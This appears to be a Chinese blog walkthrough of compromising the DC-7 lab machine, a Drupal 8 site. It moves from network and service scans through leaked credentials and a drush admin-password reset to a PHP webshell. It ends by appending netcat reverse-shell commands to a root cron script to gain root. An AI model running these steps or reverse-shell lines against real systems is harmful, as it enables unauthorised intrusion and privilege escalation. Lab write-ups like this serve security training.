DC-7靶机渗透详细流程

信息收集:

1.存活扫描:

由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:

arp-scan

arp-scan -I eth0 -l

└─# arp-scan -I eth0 -l  
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dd:ee:6a, IPv4: 192.168.10.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:c0:00:08       VMware, Inc.
192.168.10.2    00:50:56:e5:b1:08       VMware, Inc.
192.168.10.130 //靶机 00:0c:29:b8:22:3c       VMware, Inc.
192.168.10.254  00:50:56:ee:95:de       VMware, Inc.

2.端口扫描:

nmap -sS -p- 192.168.10.130

└─# nmap -sS -p- 192.168.10.130
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B8:22:3C (VMware)

3.服务扫描:

nmap -sS -sVC -p 80,22 -O --version-all 192.168.10.130

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
|_http-generator: Drupal 8 (https://www.drupal.org)
MAC Address: 00:0C:29:B8:22:3C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

4.Namp漏扫:

nmap -sS -p 80,22 --script=vuln 192.168.10.128

没啥信息

└─# nmap -sS -p 80,22 --script=vuln 192.168.10.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 21:49 CST
Nmap scan report for 192.168.10.130
Host is up (0.00041s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.10.130:80/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.10.130:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|     
|     Path: http://192.168.10.130:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8 
|_  /README.txt: Interesting, a readme.
MAC Address: 00:0C:29:B8:22:3C (VMware)

web部分:

web页面:

欢迎来到DC-7

DC-7引入了一些“新”概念,但我让你自己去弄清楚它们是什么

虽然这个挑战并不完全是技术性的,但如果您需要诉诸暴力强制或字典攻击,您可能不会成功。

你要做的,就是跳出思维定势。

“跳出”框框

在这里应该是想告诉我们,登录页面是使用不了SQL注入和弱口令的。

DC-7靶机渗透详细流程_第1张图片

whatweb:

看样子CMSDrupal 8

└─# whatweb http://192.168.10.130
http://192.168.10.130 [200 OK] Apache[2.4.25],
Content-Language[en], 
Country[RESERVED][ZZ], 
Drupal, HTML5, 
HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], 
IP[192.168.10.130], 
MetaGenerator[Drupal 8 (https://www.drupal.org)], 
PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], 
UncommonHeaders[x-drupal-dynamic-cache,link,
x-content-type-options,x-generator,x-drupal-cache], 
X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

Google:

web页面发现这个,结合作者的描述,是要用 Google 去搜索一下。

DC-7靶机渗透详细流程_第2张图片

发现 GitHub 个人主页和配置文件,config.php

DC-7靶机渗透详细流程_第3张图片

DC-7靶机渗透详细流程_第4张图片

SSH:

这里发现的账密不能登录网页后台,但是可以ssh连接。

DC-7靶机渗透详细流程_第5张图片

这里发现邮件。

DC-7靶机渗透详细流程_第6张图片

dc7user@dc-7:~$ ls
backups  mbox
You have new mail in /var/mail/dc7user
dc7user@dc-7:~$ ls  /var/mail/dc7user/*
ls: cannot access '/var/mail/dc7user/*': Not a directory
dc7user@dc-7:~$ ls  /var/mail/dc7user
/var/mail/dc7user
dc7user@dc-7:~$ ls  backups/*
backups/website.sql.gpg  backups/website.tar.gz.gpg
dc7user@dc-7:~$ cat /var/mail/dc7user
From root@dc-7 Tue Feb 06 23:45:17 2024
Return-path: 
Envelope-to: root@dc-7
Delivery-date: Tue, 06 Feb 2024 23:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from )
        id 1rXLlF-0000H1-1P
        for root@dc-7; Tue, 06 Feb 2024 23:45:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron  /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
Message-Id: 
Date: Tue, 06 Feb 2024 23:45:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Feb 07 00:01:25 2024
Return-path: 
Envelope-to: root@dc-7
Delivery-date: Wed, 07 Feb 2024 00:01:25 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from )
        id 1rXM0q-0000Yn-OV
        for root@dc-7; Wed, 07 Feb 2024 00:01:24 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron  /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
Message-Id: 
Date: Wed, 07 Feb 2024 00:01:24 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Feb 07 17:00:27 2024
Return-path: 
Envelope-to: root@dc-7
Delivery-date: Wed, 07 Feb 2024 17:00:27 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from )
        id 1rXbv1-0000FQ-7Z
        for root@dc-7; Wed, 07 Feb 2024 17:00:27 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron  /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
Message-Id: 
Date: Wed, 07 Feb 2024 17:00:27 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Wed Feb 07 17:15:16 2024
Return-path: 
Envelope-to: root@dc-7
Delivery-date: Wed, 07 Feb 2024 17:15:16 +1000
Received: from root by dc-7 with local (Exim 4.89)
        (envelope-from )
        id 1rXc9H-0000HM-QG
        for root@dc-7; Wed, 07 Feb 2024 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron  /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
X-Cron-Env: 
Message-Id: 
Date: Wed, 07 Feb 2024 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

DC-7靶机渗透详细流程_第7张图片

发现可执行文件,看一下内容。

DC-7靶机渗透详细流程_第8张图片

根据 资料内容 Drush 是用来管理 Drupal的shell 通过 Drash + 命令的形式来管理 Drupal。上面的提示应该是让我们修改网站后台的登陆密码。

DC-7靶机渗透详细流程_第9张图片

我们通过重置密码的方式来 猜测网站登录的用户名,,发现是有admin这个用户名的

DC-7靶机渗透详细流程_第10张图片

Drush

我们使用 Drush 来修改 admin 的密码,,修改成功,我们尝试登录。登录成功

drush user--password-'admin'changed password for admin

DC-7靶机渗透详细流程_第11张图片

反弹shell:

我们根据 backups.sh 发现该文件可用于提权,且有执行权限的是www-data

DC-7靶机渗透详细流程_第12张图片

有了思路,我们先上传木马获取webshell。cms是 drupal 8 的版本,得安装插件才能写入php语句。

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

DC-7靶机渗透详细流程_第13张图片

DC-7靶机渗透详细流程_第14张图片

DC-7靶机渗透详细流程_第15张图片

这样就ok了,找个地方编辑一下 测试一下。

DC-7靶机渗透详细流程_第16张图片

测试成功

DC-7靶机渗透详细流程_第17张图片

开始写入木马,这里我们用 哥斯拉webshell。

DC-7靶机渗透详细流程_第18张图片

DC-7靶机渗透详细流程_第19张图片

DC-7靶机渗透详细流程_第20张图片

我们把反弹shell的命令追加到 backups.sh 中,这边定时执行就会反弹shell得到root权限。

echo nc -e /bin/bash/ 192.168.10.129 2233 >>backups.sh //这里的/bin/bash 反弹不上
echo nc 192.168.10.129 7788 -e /bin/sh >> backups.sh

DC-7靶机渗透详细流程_第21张图片

这里不知道为啥, /bin/bash的 shell 一直连接不上,好在最后还是拿到了 root 权限。

大伙这里自己看吧。

DC-7靶机渗透详细流程_第22张图片

你可能感兴趣的:(DC靶机系列渗透测试,web安全,网络安全,web,网络,安全)